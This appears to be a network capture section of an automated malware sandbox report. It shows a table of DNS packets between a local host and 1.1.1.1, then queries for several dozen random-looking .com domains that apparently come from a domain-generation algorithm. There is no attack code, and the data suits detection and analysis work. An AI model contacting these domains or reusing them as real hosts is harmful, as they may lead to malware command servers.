Aug 23, 2024 18:43:45.978962898 CEST	53	52191	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:45.980390072 CEST	53	54657	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:45.980509996 CEST	53	64643	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:45.982055902 CEST	53	54526	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:45.982500076 CEST	53	52141	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:45.984838963 CEST	53	50231	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:45.984853029 CEST	53	60015	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:45.987957954 CEST	53	64338	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:45.988850117 CEST	53	50994	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:45.994375944 CEST	53	56805	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:45.994621038 CEST	53	58247	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:45.996124983 CEST	53	55788	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:45.996980906 CEST	49459	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:45.997076988 CEST	63927	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:45.997188091 CEST	49715	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:45.997507095 CEST	53	51581	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:45.997612000 CEST	53	55687	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:45.997735023 CEST	51604	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:45.998347044 CEST	56334	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:45.998605967 CEST	55417	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:45.998883963 CEST	54752	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:45.999046087 CEST	53	64251	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:45.999113083 CEST	61456	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:45.999623060 CEST	51573	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:45.999870062 CEST	55743	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:46.000083923 CEST	54299	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:46.000312090 CEST	52460	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:46.000524998 CEST	50838	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:46.000708103 CEST	55275	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:46.000935078 CEST	51747	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:46.001105070 CEST	53	51727	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:46.001152992 CEST	59818	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:46.003582001 CEST	51907	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:46.003824949 CEST	53978	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:46.003920078 CEST	53	63816	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:46.003971100 CEST	61612	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:46.004018068 CEST	60487	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:46.004309893 CEST	62907	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:46.004508972 CEST	64859	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:46.004508972 CEST	50261	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:46.004739046 CEST	57879	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:46.004848957 CEST	53871	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:46.004944086 CEST	53147	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:46.005131006 CEST	54782	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:46.005158901 CEST	61281	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:46.005326986 CEST	51652	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:46.005481005 CEST	49919	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:46.005649090 CEST	60003	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:46.005654097 CEST	53	50501	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:46.005784035 CEST	60840	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:46.005920887 CEST	58056	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:46.006504059 CEST	54637	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:46.011141062 CEST	53	49715	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:46.011451006 CEST	53	56334	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:46.011851072 CEST	53	63927	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:46.011985064 CEST	53	51604	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:46.012269974 CEST	53	49459	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:46.012624025 CEST	53	54752	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:46.012638092 CEST	53	61456	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:46.012742043 CEST	53	51573	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:46.012799025 CEST	53	60487	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:46.013159037 CEST	53	50838	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:46.013676882 CEST	53	52460	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:46.015269041 CEST	53	59818	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:46.015849113 CEST	53	64859	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:46.015914917 CEST	53	53978	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:46.016202927 CEST	53	50261	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:46.016314030 CEST	53	61612	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:46.016541958 CEST	53	62907	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:46.017491102 CEST	53	54637	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:46.017776966 CEST	53	60003	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:46.017982960 CEST	53	54782	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:46.018037081 CEST	53	57879	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:46.018050909 CEST	53	51652	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:46.018321991 CEST	53	49919	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:46.018791914 CEST	53	58056	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:46.019398928 CEST	53	61281	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:46.034291029 CEST	53	55275	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:46.035361052 CEST	53	54299	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:46.036190033 CEST	53	51907	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:46.036859989 CEST	53	53147	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:46.043392897 CEST	53	60840	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:46.161762953 CEST	53	51747	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:46.166215897 CEST	53	53871	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:46.166565895 CEST	53	55743	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:46.190798044 CEST	53	55417	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:46.260128975 CEST	53	50922	1.1.1.1	192.168.2.5
Aug 23, 2024 18:44:04.556627989 CEST	64869	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:44:04.557362080 CEST	60870	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:44:04.557780981 CEST	49685	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:44:04.567301989 CEST	54407	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:44:04.567852974 CEST	56198	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:44:04.568134069 CEST	53	64869	1.1.1.1	192.168.2.5
Aug 23, 2024 18:44:04.568396091 CEST	60332	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:44:04.568907976 CEST	61368	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:44:04.569046021 CEST	53	60870	1.1.1.1	192.168.2.5
Aug 23, 2024 18:44:04.569403887 CEST	50787	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:44:04.570231915 CEST	59168	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:44:04.570774078 CEST	60674	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:44:04.571310997 CEST	55044	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:44:04.571787119 CEST	63610	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:44:04.572264910 CEST	63263	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:44:04.572792053 CEST	56791	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:44:04.573319912 CEST	65307	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:44:04.573824883 CEST	58296	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:44:04.574311972 CEST	61462	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:44:04.574806929 CEST	59053	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:44:04.575330019 CEST	54718	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:44:04.575819969 CEST	59823	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:44:04.576363087 CEST	54013	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:44:04.576833963 CEST	51733	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:44:04.577337027 CEST	60559	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:44:04.577827930 CEST	54727	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:44:04.578332901 CEST	64062	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:44:04.578830957 CEST	59025	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:44:04.578954935 CEST	53	60332	1.1.1.1	192.168.2.5
Aug 23, 2024 18:44:04.579323053 CEST	63096	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:44:04.579415083 CEST	53	61368	1.1.1.1	192.168.2.5
Aug 23, 2024 18:44:04.579832077 CEST	53	50787	1.1.1.1	192.168.2.5
Aug 23, 2024 18:44:04.580758095 CEST	53	59168	1.1.1.1	192.168.2.5
Aug 23, 2024 18:44:04.581311941 CEST	53	55044	1.1.1.1	192.168.2.5
Aug 23, 2024 18:44:04.582227945 CEST	53	63263	1.1.1.1	192.168.2.5
Aug 23, 2024 18:44:04.583033085 CEST	53	63610	1.1.1.1	192.168.2.5
Aug 23, 2024 18:44:04.583045006 CEST	53	60674	1.1.1.1	192.168.2.5
Aug 23, 2024 18:44:04.583794117 CEST	53	56791	1.1.1.1	192.168.2.5
Aug 23, 2024 18:44:04.584434986 CEST	53	58296	1.1.1.1	192.168.2.5
Aug 23, 2024 18:44:04.585057974 CEST	53	65307	1.1.1.1	192.168.2.5
Aug 23, 2024 18:44:04.585885048 CEST	53	61462	1.1.1.1	192.168.2.5
Aug 23, 2024 18:44:04.590270042 CEST	50755	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:44:04.590457916 CEST	52891	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:44:04.590600967 CEST	59851	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:44:04.590747118 CEST	57914	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:44:04.590882063 CEST	63112	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:44:04.591017008 CEST	61542	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:44:04.591141939 CEST	52575	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:44:04.591274977 CEST	65070	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:44:04.591285944 CEST	53	54718	1.1.1.1	192.168.2.5
Aug 23, 2024 18:44:04.591299057 CEST	53	51733	1.1.1.1	192.168.2.5
Aug 23, 2024 18:44:04.591309071 CEST	53	64062	1.1.1.1	192.168.2.5
Aug 23, 2024 18:44:04.591397047 CEST	53	63096	1.1.1.1	192.168.2.5
Aug 23, 2024 18:44:04.591715097 CEST	62705	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:44:04.591865063 CEST	57456	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:44:04.592010975 CEST	50954	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:44:04.592499018 CEST	49390	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:44:04.592647076 CEST	57263	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:44:04.593146086 CEST	52272	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:44:04.593287945 CEST	54523	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:44:04.593419075 CEST	51694	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:44:04.593550920 CEST	58309	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:44:04.593687057 CEST	55031	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:44:04.593816996 CEST	60495	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:44:04.593955994 CEST	55919	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:44:04.594089985 CEST	62030	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:44:04.594224930 CEST	50503	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:44:04.594362020 CEST	62570	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:44:04.594496965 CEST	56772	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:44:04.594630003 CEST	62645	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:44:04.594758987 CEST	64189	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:44:04.594883919 CEST	59270	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:44:04.598965883 CEST	53	54407	1.1.1.1	192.168.2.5
Aug 23, 2024 18:44:04.600219011 CEST	53	56198	1.1.1.1	192.168.2.5
Aug 23, 2024 18:44:04.601634026 CEST	53	50755	1.1.1.1	192.168.2.5
Aug 23, 2024 18:44:04.601722002 CEST	53	57914	1.1.1.1	192.168.2.5
Aug 23, 2024 18:44:04.602355003 CEST	53	62705	1.1.1.1	192.168.2.5
Aug 23, 2024 18:44:04.602390051 CEST	53	63112	1.1.1.1	192.168.2.5
Aug 23, 2024 18:44:04.603051901 CEST	53	52575	1.1.1.1	192.168.2.5
Aug 23, 2024 18:44:04.603106976 CEST	53	57456	1.1.1.1	192.168.2.5
Aug 23, 2024 18:44:04.603122950 CEST	53	49390	1.1.1.1	192.168.2.5
Aug 23, 2024 18:44:04.603194952 CEST	53	57263	1.1.1.1	192.168.2.5
Aug 23, 2024 18:44:04.603863955 CEST	53	50954	1.1.1.1	192.168.2.5
Aug 23, 2024 18:44:04.604579926 CEST	51403	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:44:04.604943037 CEST	53	51694	1.1.1.1	192.168.2.5
Aug 23, 2024 18:44:04.604953051 CEST	53	55919	1.1.1.1	192.168.2.5
Aug 23, 2024 18:44:04.604964018 CEST	53	54523	1.1.1.1	192.168.2.5
Aug 23, 2024 18:44:04.605243921 CEST	53	50503	1.1.1.1	192.168.2.5
Aug 23, 2024 18:44:04.606221914 CEST	53	64189	1.1.1.1	192.168.2.5
Aug 23, 2024 18:44:04.606698036 CEST	53	59053	1.1.1.1	192.168.2.5
Aug 23, 2024 18:44:04.607666969 CEST	53	62570	1.1.1.1	192.168.2.5
Aug 23, 2024 18:44:04.607728958 CEST	53	62645	1.1.1.1	192.168.2.5
Aug 23, 2024 18:44:04.609097004 CEST	59716	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:44:04.613178968 CEST	53	54727	1.1.1.1	192.168.2.5
Aug 23, 2024 18:44:04.614398956 CEST	54929	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:44:04.615474939 CEST	53	51403	1.1.1.1	192.168.2.5
Aug 23, 2024 18:44:04.616291046 CEST	53	49685	1.1.1.1	192.168.2.5
Aug 23, 2024 18:44:04.620898008 CEST	53	59716	1.1.1.1	192.168.2.5
Aug 23, 2024 18:44:04.622442961 CEST	57395	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:44:04.622620106 CEST	54055	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:44:04.622922897 CEST	53	65070	1.1.1.1	192.168.2.5
Aug 23, 2024 18:44:04.623965025 CEST	53	52891	1.1.1.1	192.168.2.5
Aug 23, 2024 18:44:04.624867916 CEST	53	54929	1.1.1.1	192.168.2.5
Aug 23, 2024 18:44:04.625479937 CEST	53	60495	1.1.1.1	192.168.2.5
Aug 23, 2024 18:44:04.625972986 CEST	53	62030	1.1.1.1	192.168.2.5
Aug 23, 2024 18:44:04.626184940 CEST	57041	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:44:04.626234055 CEST	53	58309	1.1.1.1	192.168.2.5
Aug 23, 2024 18:44:04.628232002 CEST	53	59270	1.1.1.1	192.168.2.5
Aug 23, 2024 18:44:04.629730940 CEST	53	55031	1.1.1.1	192.168.2.5
Aug 23, 2024 18:44:04.633356094 CEST	53	57395	1.1.1.1	192.168.2.5
Aug 23, 2024 18:44:04.634584904 CEST	58758	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:44:04.634757996 CEST	58869	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:44:04.637434959 CEST	53	57041	1.1.1.1	192.168.2.5
Aug 23, 2024 18:44:04.645438910 CEST	53	58758	1.1.1.1	192.168.2.5
Aug 23, 2024 18:44:04.645797014 CEST	53	58869	1.1.1.1	192.168.2.5
Aug 23, 2024 18:44:04.654153109 CEST	53	54055	1.1.1.1	192.168.2.5
Aug 23, 2024 18:44:04.733388901 CEST	53	60559	1.1.1.1	192.168.2.5
Aug 23, 2024 18:44:04.734286070 CEST	53	59823	1.1.1.1	192.168.2.5
Aug 23, 2024 18:44:04.756159067 CEST	53	52272	1.1.1.1	192.168.2.5
Aug 23, 2024 18:44:04.759641886 CEST	58849	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:44:04.766499996 CEST	63005	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:44:04.770829916 CEST	53	58849	1.1.1.1	192.168.2.5
Aug 23, 2024 18:44:04.778783083 CEST	53	56772	1.1.1.1	192.168.2.5
Aug 23, 2024 18:44:04.782661915 CEST	53	61542	1.1.1.1	192.168.2.5
Aug 23, 2024 18:44:04.866782904 CEST	53759	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:44:04.901906013 CEST	53	59851	1.1.1.1	192.168.2.5
Aug 23, 2024 18:44:04.921993017 CEST	53	54013	1.1.1.1	192.168.2.5
Aug 23, 2024 18:44:04.965892076 CEST	61681	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:44:05.008608103 CEST	53	53759	1.1.1.1	192.168.2.5
Aug 23, 2024 18:44:05.050657034 CEST	49912	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:44:05.063622952 CEST	53	59025	1.1.1.1	192.168.2.5
Aug 23, 2024 18:44:05.073441029 CEST	60781	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:44:05.078316927 CEST	53	63005	1.1.1.1	192.168.2.5
Aug 23, 2024 18:44:05.081211090 CEST	53	60781	1.1.1.1	192.168.2.5
Aug 23, 2024 18:44:05.164768934 CEST	61451	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:44:05.168492079 CEST	58355	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:44:05.181545973 CEST	53	61681	1.1.1.1	192.168.2.5
Aug 23, 2024 18:44:05.361274004 CEST	53	49912	1.1.1.1	192.168.2.5
Aug 23, 2024 18:44:05.376519918 CEST	58355	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:44:05.376553059 CEST	61451	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:44:05.383936882 CEST	53	61451	1.1.1.1	192.168.2.5
Aug 23, 2024 18:44:05.482532978 CEST	53	61451	1.1.1.1	192.168.2.5
Aug 23, 2024 18:44:05.499916077 CEST	53	58355	1.1.1.1	192.168.2.5
Aug 23, 2024 18:44:05.500314951 CEST	53	58355	1.1.1.1	192.168.2.5
Aug 23, 2024 18:44:06.017254114 CEST	52865	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:44:06.123022079 CEST	65411	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:44:06.235950947 CEST	52865	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:44:06.329720974 CEST	65411	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:44:06.355490923 CEST	53	52865	1.1.1.1	192.168.2.5
Aug 23, 2024 18:44:06.355537891 CEST	53	52865	1.1.1.1	192.168.2.5
Aug 23, 2024 18:44:06.501450062 CEST	53	65411	1.1.1.1	192.168.2.5
Aug 23, 2024 18:44:06.501507044 CEST	53	65411	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Aug 23, 2024 18:42:11.828021049 CEST	192.168.2.5	1.1.1.1	0x4ef5	Standard query (0)	gatyfus.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.828984022 CEST	192.168.2.5	1.1.1.1	0xace9	Standard query (0)	lyvyxor.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.829154968 CEST	192.168.2.5	1.1.1.1	0xd200	Standard query (0)	puvyxil.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.830239058 CEST	192.168.2.5	1.1.1.1	0x9a83	Standard query (0)	qetyfuv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.831547022 CEST	192.168.2.5	1.1.1.1	0xaeb1	Standard query (0)	gahyqah.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.832987070 CEST	192.168.2.5	1.1.1.1	0x2d36	Standard query (0)	lyryfyd.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.834098101 CEST	192.168.2.5	1.1.1.1	0x1029	Standard query (0)	vocyzit.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.835414886 CEST	192.168.2.5	1.1.1.1	0x8300	Standard query (0)	qegyqaq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.836514950 CEST	192.168.2.5	1.1.1.1	0xa887	Standard query (0)	vojyqem.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.837829113 CEST	192.168.2.5	1.1.1.1	0xf0a2	Standard query (0)	purydyv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.839317083 CEST	192.168.2.5	1.1.1.1	0xcbd9	Standard query (0)	gacyzuz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.841167927 CEST	192.168.2.5	1.1.1.1	0x843e	Standard query (0)	lygymoj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.842808962 CEST	192.168.2.5	1.1.1.1	0xf955	Standard query (0)	vowydef.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.844289064 CEST	192.168.2.5	1.1.1.1	0x9755	Standard query (0)	qexylup.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.845829010 CEST	192.168.2.5	1.1.1.1	0x5123	Standard query (0)	pufymoq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.847326994 CEST	192.168.2.5	1.1.1.1	0x9de5	Standard query (0)	gaqydeb.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.850944042 CEST	192.168.2.5	1.1.1.1	0x12c0	Standard query (0)	lyxylux.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.853646994 CEST	192.168.2.5	1.1.1.1	0x3472	Standard query (0)	vofymik.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.855118990 CEST	192.168.2.5	1.1.1.1	0x9918	Standard query (0)	qeqysag.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.859618902 CEST	192.168.2.5	1.1.1.1	0x80a2	Standard query (0)	puzylyp.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.861157894 CEST	192.168.2.5	1.1.1.1	0xf6eb	Standard query (0)	gadyniw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.862869978 CEST	192.168.2.5	1.1.1.1	0xcf90	Standard query (0)	lymysan.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.865106106 CEST	192.168.2.5	1.1.1.1	0xb306	Standard query (0)	volykyc.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.866760015 CEST	192.168.2.5	1.1.1.1	0xaee7	Standard query (0)	qedynul.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.868163109 CEST	192.168.2.5	1.1.1.1	0x58a1	Standard query (0)	pumypog.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.869771004 CEST	192.168.2.5	1.1.1.1	0xf5bf	Standard query (0)	galykes.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.872014999 CEST	192.168.2.5	1.1.1.1	0x53b3	Standard query (0)	lysynur.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.873363018 CEST	192.168.2.5	1.1.1.1	0x5756	Standard query (0)	vonypom.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.875040054 CEST	192.168.2.5	1.1.1.1	0xa271	Standard query (0)	qekykev.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.877080917 CEST	192.168.2.5	1.1.1.1	0x1ad3	Standard query (0)	pupybul.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.879993916 CEST	192.168.2.5	1.1.1.1	0xe53d	Standard query (0)	lykyjad.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.881793022 CEST	192.168.2.5	1.1.1.1	0xedc6	Standard query (0)	vopybyt.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.883296967 CEST	192.168.2.5	1.1.1.1	0x6069	Standard query (0)	pujyjav.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.884567022 CEST	192.168.2.5	1.1.1.1	0x97fb	Standard query (0)	gatyvyz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.885445118 CEST	192.168.2.5	1.1.1.1	0x192c	Standard query (0)	ganypih.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.886639118 CEST	192.168.2.5	1.1.1.1	0x713d	Standard query (0)	lyvytuj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.888458967 CEST	192.168.2.5	1.1.1.1	0x5ed	Standard query (0)	vojyjof.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.889626980 CEST	192.168.2.5	1.1.1.1	0xe90b	Standard query (0)	qetyvep.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.890876055 CEST	192.168.2.5	1.1.1.1	0x63cd	Standard query (0)	puvytuq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.892930984 CEST	192.168.2.5	1.1.1.1	0xf8	Standard query (0)	gahyhob.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.894184113 CEST	192.168.2.5	1.1.1.1	0x15b9	Standard query (0)	lyryvex.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.896409035 CEST	192.168.2.5	1.1.1.1	0x7e71	Standard query (0)	vocyruk.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.897569895 CEST	192.168.2.5	1.1.1.1	0xe859	Standard query (0)	qebytiq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.899374962 CEST	192.168.2.5	1.1.1.1	0xa7fa	Standard query (0)	qegyhig.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.903932095 CEST	192.168.2.5	1.1.1.1	0x6eb2	Standard query (0)	purycap.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.905365944 CEST	192.168.2.5	1.1.1.1	0xdc51	Standard query (0)	gacyryw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.906491995 CEST	192.168.2.5	1.1.1.1	0x5bd3	Standard query (0)	lygygin.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.909323931 CEST	192.168.2.5	1.1.1.1	0xa889	Standard query (0)	qexyryl.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.913438082 CEST	192.168.2.5	1.1.1.1	0xf3d1	Standard query (0)	pufygug.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.913675070 CEST	192.168.2.5	1.1.1.1	0xbf54	Standard query (0)	gaqycos.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.913836002 CEST	192.168.2.5	1.1.1.1	0x7249	Standard query (0)	lyxywer.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.914041996 CEST	192.168.2.5	1.1.1.1	0x27e7	Standard query (0)	vofygum.com	A (IP address)	IN (0x0001)	false
